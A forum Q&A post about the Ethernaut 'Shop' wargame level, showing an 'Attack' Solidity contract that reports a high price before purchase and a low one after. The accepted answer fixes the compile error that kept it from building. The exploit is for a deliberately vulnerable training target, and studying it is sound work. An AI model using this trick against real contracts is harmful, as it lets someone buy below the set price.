# Ethernaut Challenge Shop

Tags: solidity, remix, code

I don't understand why remix doesn't allow me to compile this code, even though the logic is similar to the answers I found on the internet.

The error: *from solidity:
MyContract.sol:20:11: TypeError: Function declared as view, but this expression (potentially) modifies the state and thus requires non-payable (the default) or payable.
if (shop.isSold()) {
^-----------^*

```
pragma solidity ^0.6.0;

interface IShop {

  function isSold() external returns(bool);
  function buy() external;

}


contract Attack {
    IShop shop = IShop(0x96678CF02e45F01e31683eDF23edE7dE863D0A76);
    
    function call() external {
      shop.buy();
    }

    
    function price() public view returns (uint) {
     
      if (shop.isSold()) {
        return 10;
      }else{
        return 100;
      }

    }
}
```

Answer (score 2, accepted):

The error is clear: since `price()` is `view`, then all expressions inside can't modify the state. The compiler thinks that `isSold` can modify state since it's not marked `view`, so we need to fix that.

Basically, add `view` on the function in the interface

```
interface IShop {
  function isSold() view external returns(bool);
  function buy() external;
}
```

Comment: Thank you very much. Now everything became clear.